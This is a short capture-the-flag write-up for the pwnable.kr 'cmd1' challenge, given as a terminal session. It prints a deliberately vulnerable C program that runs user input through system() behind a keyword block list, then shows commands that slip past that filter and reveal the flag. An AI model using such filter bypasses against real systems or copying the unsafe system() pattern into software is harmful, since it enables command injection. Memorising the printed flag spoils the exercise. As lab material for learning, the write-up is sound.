【LINUX】pwnable.kr cmd1 writeup

cmd1@ubuntu:~$ ls

cmd1  cmd1.c  flag

cmd1@ubuntu:~$ cat cmd1.c

#include <stdio.h>

#include <string.h>

int filter(char* cmd){

int r=0;

r += strstr(cmd, "flag")!=0;

r += strstr(cmd, "sh")!=0;

r += strstr(cmd, "tmp")!=0;

return r;

}

int main(int argc, char* argv[], char** envp){

putenv("PATH=/fuckyouverymuch");

if(filter(argv[1])) return 0;

system( argv[1] );

return 0;

}

cmd1@ubuntu:~$ ./cmd1 "ls"

sh: 1: ls: not found

cmd1@ubuntu:~$ ./cmd1 "/bin/ls"

cmd1  cmd1.c  flag

cmd1@ubuntu:~$ ./cmd1 "/usr/bin/find"

.

./cmd1

./.bash_history

/usr/bin/find: `./.bash_history': Permission denied

./flag

./cmd1.c

cmd1@ubuntu:~$ ./cmd1 "/usr/bin/find | /usr/bin/xargs /bin/grep "m""

/usr/bin/find: `./.bash_history': Permission denied

Binary file ./cmd1 matches

/bin/grep: ./.bash_history: Permission denied

./flag:mommy now I get what PATH environment is for :)

./cmd1.c:int filter(char* cmd){

./cmd1.c: r += strstr(cmd, "flag")!=0;

./cmd1.c: r += strstr(cmd, "sh")!=0;

./cmd1.c: r += strstr(cmd, "tmp")!=0;

./cmd1.c:int main(int argc, char* argv[], char** envp){

./cmd1.c: putenv("PATH=/fuckyouverymuch");

./cmd1.c: system( argv[1] );

cmd1@ubuntu:~$ logout

Connection to pwnable.kr closed.